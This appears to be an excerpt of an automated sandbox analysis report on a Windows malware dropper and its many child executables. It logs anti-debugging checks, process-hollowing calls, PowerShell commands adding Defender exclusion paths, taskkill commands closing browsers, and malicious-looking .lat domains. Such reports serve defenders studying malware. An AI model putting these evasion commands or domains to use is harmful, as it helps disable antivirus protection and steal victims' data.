                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeOpen window title or class name: regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeOpen window title or class name: gbdyllo
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeOpen window title or class name: procmon_window_class
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeOpen window title or class name: filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: NTICE
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: SICE
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: SIWVID
                              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeProcess queried: DebugPort
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04990CDA rdtsc 0_2_04990CDA
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002D5020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_002D5020
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF652B mov eax, dword ptr fs:[00000030h]0_2_00BF652B
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFA302 mov eax, dword ptr fs:[00000030h]0_2_00BFA302
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00EDA302 mov eax, dword ptr fs:[00000030h]1_2_00EDA302
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00ED652B mov eax, dword ptr fs:[00000030h]1_2_00ED652B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00EDA302 mov eax, dword ptr fs:[00000030h]2_2_00EDA302
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00ED652B mov eax, dword ptr fs:[00000030h]2_2_00ED652B
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002F519E mov edi, dword ptr fs:[00000030h]9_2_002F519E
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002D1614 mov edi, dword ptr fs:[00000030h]9_2_002D1614
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002DFE2C GetProcessHeap,9_2_002DFE2C
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002D5020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_002D5020
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002D5014 SetUnhandledExceptionFilter,9_2_002D5014
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002D4C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_002D4C64
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002DB4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_002DB4B9
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeMemory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: Yara matchFile source: Process Memory Space: 81d22383f9.exe PID: 7712, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: bb31c9d4a53941b6b913f33980d23feb.exe PID: 2792, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: d0e32932f8.exe PID: 6672, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: d0e32932f8.exe PID: 7728, type: MEMORYSTR
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002F519E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,9_2_002F519E
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeMemory written: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
                              Source: ed7d415177.exe, 00000018.00000003.2933368329.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe "C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe "C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe "C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe "C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe "C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe "C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe "C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe "C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe "C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe "C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe "C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeProcess created: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe "C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe "C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe "C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                              Source: bc893816fa.exe, 0000001F.00000000.3065867664.0000000000A62000.00000002.00000001.01000000.0000001E.sdmp, bc893816fa.exe, 00000031.00000000.3263758575.0000000000A62000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                              Source: file.exe, 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: oDN#zProgram Manager
                              Source: skotes.exe, skotes.exe, 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: DN#zProgram Manager
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: EnumSystemLocalesW,9_2_002E3086
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: GetLocaleInfoW,9_2_002E30D1
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_002E3178
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: GetLocaleInfoW,9_2_002DF21C
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_002E2A13
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: GetLocaleInfoW,9_2_002E327E
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: EnumSystemLocalesW,9_2_002E2C64
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_002E2CFF
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: EnumSystemLocalesW,9_2_002DF717
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: EnumSystemLocalesW,9_2_002E2F52
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: GetLocaleInfoW,9_2_002E2FB1
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019676001\6cc6a39605.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019676001\6cc6a39605.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019677001\fbaaecbd82.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019677001\fbaaecbd82.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019678001\e577d0589a.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019678001\e577d0589a.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019679001\cd81608004.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019679001\cd81608004.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019680001\92aba5cf15.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019680001\92aba5cf15.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019681001\e637491e0c.exe VolumeInformationJump to behavior
